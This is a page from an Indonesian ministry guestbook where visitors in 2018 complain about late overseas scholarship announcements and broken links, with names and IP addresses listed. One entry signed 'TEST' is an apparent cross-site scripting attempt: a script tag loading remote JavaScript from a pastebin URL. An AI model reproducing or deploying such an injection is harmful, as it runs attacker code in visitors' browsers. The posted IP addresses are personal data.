Buku Tamu

Buku tamu tidak diperuntukkan untuk forum Tanya Jawab.
Silakan melalui fasilitas Tanya Jawab yang sudah disediakan agar pertanyaan bisa diproses...
762681




Zainal Arifin | IP: 110.138.149.18 | Tanggal: 02/08/2018 Jam: 2018-08-02 11:16:47 |
Assalamualaikum W. W. Bapak/Ibu yang Kami hormati, Perkenankan Saya atas nama Zainal Arifin dari kampus IAI Shalahuddin Al-Ayyubi (INISA) Tambun-Bekasi, mau bertantya boleh tidak bisa melihat terkait surat edaran terkait NIRM/NIRL sebelum 1055/Dj.VPP.00.91041/2016 tentang NIRM/NIRL
TEST | IP: 116.206.15.35 | Tanggal: 28/07/2018 Jam: 2018-07-28 07:27:10 |
pscript type=text/javascript src=https://pastebin.com/raw/nnMup6sn/script/p
aspandi | IP: 36.75.172.212 | Tanggal: 23/07/2018 Jam: 2018-07-23 07:12:01 |
link Pengumuman Tambahan Hasil Seleksi Progam S1 Non Beasiswa (Bea Mandiri) Perguruan Tinggi Luar Mesir Tahun 2018 kok error 404 yA? MOHON KOREKSI.
Yani | IP: 114.125.76.229 | Tanggal: 19/07/2018 Jam: 2018-07-19 23:41:36 |
Lama banget ya mas pengumuman maroko dll, gk bisa pegang omongan kemenag lgi nih
Ubaidillah | IP: 36.66.195.177 | Tanggal: 18/07/2018 Jam: 2018-07-18 22:11:49 |
Luar biasa dan Semangat Perguruan Tinggi Islam
Nella Nur Nasyatul Aslina Ahmad | IP: 180.246.186.21 | Tanggal: 18/07/2018 Jam: 2018-07-18 09:19:34 |
subhnallah banget, pengen kesana tahun depan
Murad | IP: 64.233.173.21 | Tanggal: 15/07/2018 Jam: 2018-07-15 02:08:19 |
Parah banget pengumuman maroko belom diumumin, tepatilah janji wahai para wakil rakyat, bagaimana indonesia mau maju kalau hal kecil saja di elat2kan
Wawan | IP: 182.1.67.112 | Tanggal: 14/07/2018 Jam: 2018-07-14 17:16:35 |
Pengumuman Bantuan Penyelesaian Pendidikan DIktis kok belum muncul ya. sudah satu bulan lebih terlembatnya dari tgl yg sudah ditentukan 8 Juni 2018. Diktis niat gak sih bikin program BPP itu.Jika gak niat gak perlu bikin krn kita sudah wara wiri bikin surat administrasi. Terima Kasih atas respon min. Semoga Kemenag tetap jaya istiqomah ditengah ikhlas beramal.
Taufiqur Rizki Gemellian | IP: 114.125.126.11 | Tanggal: 09/07/2018 Jam: 2018-07-09 12:28:21 |
hampir 1 bulan lebih kami menunggu pengumuman untuk beasiswa Maroko,Sudan,dan Lebanon mohon segera diumumkan ! Semoga pihak panitia bisa lebih profesional tahun depan
hanafiyah | IP: 168.235.200.56 | Tanggal: 07/07/2018 Jam: 2018-07-07 19:59:36 |
kapan pengumuman ke maroko sudan lebanon?
Syafil umam | IP: 64.233.173.14 | Tanggal: 04/07/2018 Jam: 2018-07-04 22:38:43 |
Yang saya keluhkan di sini adalah kesalahan penulisan nama dalam pengumuman hasil seleksi non beasiswa S-1 Mesir, nama asli saya syafil umam tapi di pengumuman syaiful umam, tapi nomer peserta ujiannya sama, mohon responnya cepat, karena saya akan segera melengkapi berkas-berkas pemberangkatan ke Mesir. Afwan
Jafar | IP: 64.233.173.15 | Tanggal: 04/07/2018 Jam: 2018-07-04 19:50:48 |
Asalamualaikum, alafu, kenapa yg keluar hanya pengumuman mesir saja, pengumuman maroko, sudan lebanon mana tad? Syukron
Mufid Fattah | IP: 8.37.233.67 | Tanggal: 03/07/2018 Jam: 2018-07-03 18:49:29 |
Assalamualaikum, afwan, kenapa sampai sekarang pengumuman hasil seleksi timur tengah belum keluar? Jikalau memang ada penundaan dalam pengumuman nya, seharusnya ada pengumuman resmi terkait penundaannya. Mohon kemenag bisa bekerja secara profesional, tanpa mengurangi rasa hormat saya kepada kemenag.
Baihaqi | IP: 64.233.173.19 | Tanggal: 02/07/2018 Jam: 2018-07-02 15:52:27 |
Asslamualaikum admin Perlunya dalam pengumuman hasil seleksi Timteng yang belum keluar. agar bisa memberi SuKet penundaan ataupun semacamnya, Tanpa mengurangi rasa hormat, Mohon maaf sebelumnya. sekian Terimakasih wassalam..
Muhammad Rifky Hamid | IP: 168.235.200.24 | Tanggal: 02/07/2018 Jam: 2018-07-02 15:51:47 |
Assalamu alaikum, Pengumuman seleksi timur tengahnya tidak sesuai jadwal yang ada di juknis, keprofesionalitasnya harus lebih ditingkatkan, dan juga kalo ada penundaan harusnya ada pemberitahuan, wassalam
Muhammad | IP: 168.235.194.70 | Tanggal: 01/07/2018 Jam: 2018-07-01 21:11:37 |
Kapan pengumuman hasil seleksi timur tengah? Katanya kan akan diumumkan tanggal 1 juli. Terima kasih
RIZKI AFRIANSANI | IP: 36.77.219.25 | Tanggal: 02/06/2018 Jam: 2018-06-02 00:07:13 |
Assalamualaikum mau tanya kira kira pengumuman hasil tes ke timteng kapan ya
fajar seto | IP: 114.124.180.18 | Tanggal: 02/05/2018 Jam: 2018-05-02 14:06:36 |
Assalamualaikum warohmatullahi wabarakaatuh Sekedar memberi masukan, kiranya dapat mengupdate alamat website yang tertera di surat/edaran yang dikeluarkan oleh Diktis. Semisal di Pengumuman tentang penerimaan beasiswa S1 Luar Negeri, tgl 22 April 2018, kami masyarakat umum agak kesulitan melakukan cek keabsahan berita, karena website yang tertera di Pengumuman tsb (NOMOR : 1649/Dj.I/Dt.I.III/PP.04/04/2018) tidak dapat diakses. Demikian, terima kasih Wasslamualaikum warohmatullahi wabarakaatuh
Hilmaas | IP: 223.255.229.75 | Tanggal: 25/04/2018 Jam: 2018-04-25 07:54:08 |
Assalamualaikum, maaf saya ingin bertanya. Untuk syarat pendaftaran beasiswa timur tengah yg ke maroko kenapa usia ijazah tidak boleh lebih dari 1 tahun ya ? Jika ada yang ingin mendaftar akan tetapi usia ijazah sudah 2 tahun apakah tetap bisa mendaftar ?
Mutawaroh | IP: 112.215.172.60 | Tanggal: 20/04/2018 Jam: 2018-04-20 20:18:05 |
Assalamualaikum pak/Bu Saya mendapat surat edaran mengenai pembukaan pendaftaran beasiswa timur tengah 2018, tapi kenapa di web resmi belum ada untuk tahun 2018 ya pak/Bu ? Mohon kejelasan nya, agar jadwal bisa diprediksi kan sehingga tidak tertinggal infonya. Terimakasih Wassalamualaikum

Halaman: 1 2 3 4 18 Next >> Jumlah Data : 359